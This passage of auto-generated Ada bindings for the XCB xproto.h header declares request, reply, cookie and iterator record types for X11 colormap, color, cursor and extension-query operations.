xcb_install_colormap_request_t -- * type xcb_install_colormap_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3774 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3775 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3776 cmap : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:3777 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3773 --* Opcode for xcb_uninstall_colormap. --* -- * @brief xcb_uninstall_colormap_request_t -- * type xcb_uninstall_colormap_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3787 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3788 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3789 cmap : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:3790 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3786 --* -- * @brief xcb_list_installed_colormaps_cookie_t -- * type xcb_list_installed_colormaps_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:3797 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3796 --* Opcode for xcb_list_installed_colormaps. --* -- * @brief xcb_list_installed_colormaps_request_t -- * type xcb_list_installed_colormaps_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3807 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3808 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3809 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:3810 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3806 --* -- * @brief xcb_list_installed_colormaps_reply_t -- * type xcb_list_installed_colormaps_reply_t_array2015 is array (0 .. 21) of aliased bits_stdint_uintn_h.uint8_t; type xcb_list_installed_colormaps_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3817 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3818 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3819 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3820 cmaps_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3821 pad1 : aliased xcb_list_installed_colormaps_reply_t_array2015; -- /usr/include/xcb/xproto.h:3822 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3816 --* -- * @brief xcb_alloc_color_cookie_t -- * type xcb_alloc_color_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:3829 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3828 --* Opcode for xcb_alloc_color. --* -- * @brief xcb_alloc_color_request_t -- * type xcb_alloc_color_request_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_alloc_color_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3839 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3840 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3841 cmap : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:3842 red : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3843 green : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3844 blue : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3845 pad1 : aliased xcb_alloc_color_request_t_array1823; -- /usr/include/xcb/xproto.h:3846 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3838 --* -- * @brief xcb_alloc_color_reply_t -- * type xcb_alloc_color_reply_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_alloc_color_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3853 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3854 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3855 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3856 red : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3857 green : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3858 blue : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3859 pad1 : aliased xcb_alloc_color_reply_t_array1823; -- /usr/include/xcb/xproto.h:3860 pixel : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3861 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3852 --* -- * @brief xcb_alloc_named_color_cookie_t -- * type xcb_alloc_named_color_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:3868 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3867 --* Opcode for xcb_alloc_named_color. --* -- * @brief xcb_alloc_named_color_request_t -- * type xcb_alloc_named_color_request_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_alloc_named_color_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3878 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3879 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3880 cmap : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:3881 name_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3882 pad1 : aliased xcb_alloc_named_color_request_t_array1823; -- /usr/include/xcb/xproto.h:3883 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3877 --* -- * @brief xcb_alloc_named_color_reply_t -- * type xcb_alloc_named_color_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3890 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3891 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3892 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3893 pixel : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3894 exact_red : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3895 exact_green : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3896 exact_blue : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3897 visual_red : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3898 visual_green : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3899 visual_blue : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3900 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3889 --* -- * @brief xcb_alloc_color_cells_cookie_t -- * type xcb_alloc_color_cells_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:3907 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3906 --* Opcode for xcb_alloc_color_cells. --* -- * @brief xcb_alloc_color_cells_request_t -- * type xcb_alloc_color_cells_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3917 contiguous : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3918 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3919 cmap : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:3920 colors : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3921 planes : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3922 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3916 --* -- * @brief xcb_alloc_color_cells_reply_t -- * type xcb_alloc_color_cells_reply_t_array1992 is array (0 .. 19) of aliased bits_stdint_uintn_h.uint8_t; type xcb_alloc_color_cells_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3929 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3930 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3931 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3932 pixels_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3933 masks_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3934 pad1 : aliased xcb_alloc_color_cells_reply_t_array1992; -- /usr/include/xcb/xproto.h:3935 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3928 --* -- * @brief xcb_alloc_color_planes_cookie_t -- * type xcb_alloc_color_planes_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:3942 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3941 --* Opcode for xcb_alloc_color_planes. --* -- * @brief xcb_alloc_color_planes_request_t -- * type xcb_alloc_color_planes_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3952 contiguous : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3953 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3954 cmap : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:3955 colors : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3956 reds : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3957 greens : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3958 blues : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3959 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3951 --* -- * @brief xcb_alloc_color_planes_reply_t -- * type xcb_alloc_color_planes_reply_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_alloc_color_planes_reply_t_array2620 is array (0 .. 7) of aliased bits_stdint_uintn_h.uint8_t; type xcb_alloc_color_planes_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3966 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3967 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3968 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3969 pixels_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3970 pad1 : aliased xcb_alloc_color_planes_reply_t_array1823; -- /usr/include/xcb/xproto.h:3971 red_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3972 green_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3973 blue_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3974 pad2 : aliased xcb_alloc_color_planes_reply_t_array2620; -- /usr/include/xcb/xproto.h:3975 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3965 --* Opcode for xcb_free_colors. --* -- * @brief xcb_free_colors_request_t -- * type xcb_free_colors_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3985 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3986 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3987 cmap : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:3988 plane_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:3989 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3984 subtype xcb_color_flag_t is unsigned; XCB_COLOR_FLAG_RED : constant unsigned := 1; XCB_COLOR_FLAG_GREEN : constant unsigned := 2; XCB_COLOR_FLAG_BLUE : constant unsigned := 4; -- /usr/include/xcb/xproto.h:3992 --* -- * @brief xcb_coloritem_t -- * type xcb_coloritem_t is record pixel : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4002 red : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4003 green : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4004 blue : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4005 flags : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4006 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4007 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4001 --* -- * @brief xcb_coloritem_iterator_t -- * type xcb_coloritem_iterator_t is record data : access xcb_coloritem_t; -- /usr/include/xcb/xproto.h:4014 c_rem : aliased int; -- /usr/include/xcb/xproto.h:4015 index : aliased int; -- /usr/include/xcb/xproto.h:4016 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4013 --* Opcode for xcb_store_colors. --* -- * @brief xcb_store_colors_request_t -- * type xcb_store_colors_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4026 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4027 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4028 cmap : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:4029 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4025 --* Opcode for xcb_store_named_color. --* -- * @brief xcb_store_named_color_request_t -- * type xcb_store_named_color_request_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_store_named_color_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4039 flags : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4040 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4041 cmap : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:4042 pixel : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4043 name_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4044 pad0 : aliased xcb_store_named_color_request_t_array1823; -- /usr/include/xcb/xproto.h:4045 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4038 --* -- * @brief xcb_rgb_t -- * type xcb_rgb_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_rgb_t is record red : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4052 green : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4053 blue : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4054 pad0 : aliased xcb_rgb_t_array1823; -- /usr/include/xcb/xproto.h:4055 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4051 --* -- * @brief xcb_rgb_iterator_t -- * type xcb_rgb_iterator_t is record data : access xcb_rgb_t; -- /usr/include/xcb/xproto.h:4062 c_rem : aliased int; -- /usr/include/xcb/xproto.h:4063 index : aliased int; -- /usr/include/xcb/xproto.h:4064 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4061 --* -- * @brief xcb_query_colors_cookie_t -- * type xcb_query_colors_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:4071 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4070 --* Opcode for xcb_query_colors. --* -- * @brief xcb_query_colors_request_t -- * type xcb_query_colors_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4081 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4082 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4083 cmap : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:4084 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4080 --* -- * @brief xcb_query_colors_reply_t -- * type xcb_query_colors_reply_t_array2015 is array (0 .. 21) of aliased bits_stdint_uintn_h.uint8_t; type xcb_query_colors_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4091 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4092 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4093 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4094 colors_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4095 pad1 : aliased xcb_query_colors_reply_t_array2015; -- /usr/include/xcb/xproto.h:4096 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4090 --* -- * @brief xcb_lookup_color_cookie_t -- * type xcb_lookup_color_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:4103 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4102 --* Opcode for xcb_lookup_color. --* -- * @brief xcb_lookup_color_request_t -- * type xcb_lookup_color_request_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_lookup_color_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4113 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4114 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4115 cmap : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:4116 name_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4117 pad1 : aliased xcb_lookup_color_request_t_array1823; -- /usr/include/xcb/xproto.h:4118 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4112 --* -- * @brief xcb_lookup_color_reply_t -- * type xcb_lookup_color_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4125 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4126 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4127 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4128 exact_red : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4129 exact_green : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4130 exact_blue : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4131 visual_red : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4132 visual_green : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4133 visual_blue : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4134 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4124 type xcb_pixmap_enum_t is (XCB_PIXMAP_NONE) with Convention => C; -- /usr/include/xcb/xproto.h:4137 --* Opcode for xcb_create_cursor. --* -- * @brief xcb_create_cursor_request_t -- * type xcb_create_cursor_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4148 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4149 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4150 cid : aliased xcb_cursor_t; -- /usr/include/xcb/xproto.h:4151 source : aliased xcb_pixmap_t; -- /usr/include/xcb/xproto.h:4152 mask : aliased xcb_pixmap_t; -- /usr/include/xcb/xproto.h:4153 fore_red : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4154 fore_green : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4155 fore_blue : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4156 back_red : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4157 back_green : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4158 back_blue : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4159 x : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4160 y : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4161 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4147 type xcb_font_enum_t is (XCB_FONT_NONE) with Convention => C; -- /usr/include/xcb/xproto.h:4164 --* Opcode for xcb_create_glyph_cursor. --* -- * @brief xcb_create_glyph_cursor_request_t -- * type xcb_create_glyph_cursor_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4175 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4176 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4177 cid : aliased xcb_cursor_t; -- /usr/include/xcb/xproto.h:4178 source_font : aliased xcb_font_t; -- /usr/include/xcb/xproto.h:4179 mask_font : aliased xcb_font_t; -- /usr/include/xcb/xproto.h:4180 source_char : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4181 mask_char : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4182 fore_red : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4183 fore_green : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4184 fore_blue : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4185 back_red : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4186 back_green : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4187 back_blue : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4188 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4174 --* Opcode for xcb_free_cursor. --* -- * @brief xcb_free_cursor_request_t -- * type xcb_free_cursor_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4198 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4199 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4200 cursor : aliased xcb_cursor_t; -- /usr/include/xcb/xproto.h:4201 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4197 --* Opcode for xcb_recolor_cursor. --* -- * @brief xcb_recolor_cursor_request_t -- * type xcb_recolor_cursor_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4211 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4212 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4213 cursor : aliased xcb_cursor_t; -- /usr/include/xcb/xproto.h:4214 fore_red : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4215 fore_green : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4216 fore_blue : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4217 back_red : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4218 back_green : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4219 back_blue : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4220 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4210 type xcb_query_shape_of_t is (XCB_QUERY_SHAPE_OF_LARGEST_CURSOR, XCB_QUERY_SHAPE_OF_FASTEST_TILE, XCB_QUERY_SHAPE_OF_FASTEST_STIPPLE) with Convention => C; -- /usr/include/xcb/xproto.h:4223 --* -- * @brief xcb_query_best_size_cookie_t -- * type xcb_query_best_size_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:4233 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4232 --* Opcode for xcb_query_best_size. --* -- * @brief xcb_query_best_size_request_t -- * type xcb_query_best_size_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4243 u_class : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4244 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4245 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:4246 width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4247 height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4248 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4242 --* -- * @brief xcb_query_best_size_reply_t -- * type xcb_query_best_size_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4255 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4256 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4257 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4258 width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4259 height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4260 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4254 --* -- * @brief xcb_query_extension_cookie_t -- * type xcb_query_extension_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:4267 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4266 --* Opcode for xcb_query_extension. --* -- * @brief xcb_query_extension_request_t -- * type xcb_query_extension_request_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_query_extension_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4277 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4278 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4279 name_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4280 pad1 : aliased xcb_query_extension_request_t_array1823; -- /usr/include/xcb/xproto.h:4281 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4276 --* -- * @brief xcb_query_extension_reply_t -- * type xcb_query_extension_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4288 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4289 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4290 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:4291 present : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4292 major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4293 first_event : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4294 first_error : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4295 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4287 --* -- * @brief xcb_list_extensions_cookie_t -- * type xcb_list_extensions_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:4302 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4301 --* Opcode for xcb_list_extensions. --* -- * @brief xcb_list_extensions_request_t -- * type xcb_list_extensions_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4312 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4313 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:4314 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:4311 --* -- * @brief xcb_list_extensions_reply_t -- * type xcb_list_extensions_reply_t_array2717 is array (0 .. 23) of aliased bits_stdint_uintn_h.uint8_t; type xcb_list_extensions_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4321 names_len : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:4322 sequence : aliased 